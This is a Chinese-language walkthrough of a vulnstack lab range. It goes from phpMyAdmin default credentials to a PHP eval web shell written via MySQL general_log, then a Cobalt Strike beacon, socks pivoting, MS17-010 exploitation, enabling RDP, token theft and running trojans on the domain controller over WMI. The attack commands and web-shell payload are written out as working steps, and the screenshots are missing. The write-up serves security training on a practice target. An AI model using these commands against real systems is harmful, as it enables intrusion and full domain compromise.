靶场下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
拓扑图

环境配置
win7网络配置情况:
外网

内网域网络

Win2K3网络配置情况:
内网域网络

win2008(域控)网络配置情况:
内网域网络

渗透过程
开始之前,先到win7上开启phpstudy

打开网页,发现是个phpstudy探针

phpstudy是2014的所以不存在后门漏洞
底部有个mysql连接检测,输入root,root即可连接成功


尝试连接数据库,不允许对外访问

爆破目录
有phpmyadmin

登入后台直接写shell
show variables like '%general%';
set global general_log = on;
set global general_log_file = 'C:/phpstudy/www/0kam1.php';
set @a = '<?php eval($_POST["0kam1"]);?>';

上蚁剑

CS上线
建好监听器后直接web投递(不行就手动投递)

生成木马直接扔蚁剑上,然后运行
成功上线

执行ipconfig命令可以发现一个10.10.10.0的网段

存活主机探测


对10.10.10.154进行端口扫描

发现开启了445端口,尝试扫描ms17-010漏洞
开启socks代理

配置一下proxychains4代理,用proxychains4启动msf

扫描结果显示存在ms17_010漏洞

漏洞利用

成功执行ipconfig

开启3389
set command 'wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1'

运行netstat -an命令

访问通过socks访问远程桌面

我们还需要创建一个用户,这里为了方便起见,使用 windows/smb/ms17_010_psexec 模块进行

payload需要使用 windows/shell/bind_tcp,如果使用windows/meterpreter/bind_tcp无法获取到sessions
获取到cmd后创建用户并加入管理员组

输入刚刚创建的账号密码登入成功

CS转发上线

生成木马

这里win7是台web,可以把木马直接放服务器上

再win2k3上下载木马并运行

成功上线

执行命令
net config workstation
发现存在GOD域

定位域控IP,查看dns
ipconfig /all

查看进程
ps
发现存在GOD\Administrator账号的进程

窃取进程令牌
steal_token [PID]

以GOD\Administrator权限运行木马
remote-exec wmi 10.10.10.154 C:\Documents and Settings\okami\Desktop\shell.exe

![]()
使用GOD\Administrator权限的回话,将木马上传到域控
shell copy shell.exe \\10.10.10.153\c$

执行域控上的木马
remote-exec wmi 10.10.10.153 C:\shell.exe

成功获取到域控权限



















